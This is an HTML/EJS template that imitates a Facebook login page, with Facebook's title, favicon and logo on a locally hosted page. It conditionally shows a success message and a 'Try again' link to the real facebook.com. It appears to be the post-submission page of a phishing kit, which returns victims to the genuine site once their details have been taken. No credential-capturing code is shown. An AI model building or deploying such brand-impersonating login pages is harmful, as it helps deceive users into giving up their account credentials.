<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link
      rel="shortcut icon"
      href="/images/Facebook-logo.png"
      type="image/png"
    />
    <title>facebook - log in or sign up</title>
    <link rel="stylesheet" href="/styles/error.css" />
    <link rel="preconnect" href="https://fonts.googleapis.com" />
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin />
    <link
      href="https://fonts.googleapis.com/css2?family=Noticia+Text:ital,wght@0,400;0,700;1,400;1,700&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap"
      rel="stylesheet"
    />
  </head>
  <body>
    <main class="body">
      <aside class="login-body">
        <section class="right-section">
          <div class="logo-wrapper">
            <svg
              xmlns="http://www.w3.org/2000/svg"
              fill="currentColor"
              class="facebook-logo logo-title"
              viewBox="0 0 16 16"
            >
              <path
                d="M16 8.049c0-4.446-3.582-8.05-8-8.05C3.58 0-.002 3.603-.002 8.05c0 4.017 2.926 7.347 6.75 7.951v-5.625h-2.03V8.05H6.75V6.275c0-2.017 1.195-3.131 3.022-3.131.876 0 1.791.157 1.791.157v1.98h-1.009c-.993 0-1.303.621-1.303 1.258v1.51h2.218l-.354 2.326H9.25V16c3.824-.604 6.75-3.934 6.75-7.951"
              ></path>
            </svg>
          </div>

          <% if(typeof success!=='undefined') {%>
          <section class="try-again-msg">
            <span><%=success%> </span>
            <p>Refresh the page</p>
            <button>
              <a
                href="http://www.facebook.com"
                target="_self"
                rel="noopener noreferrer"
                >Try again
              </a>
            </button>
          </section>
          <br />
          <%}%>

          <form action="/" method="post"></form>
        </section>
      </aside>
    </main>
  </body>
</html>
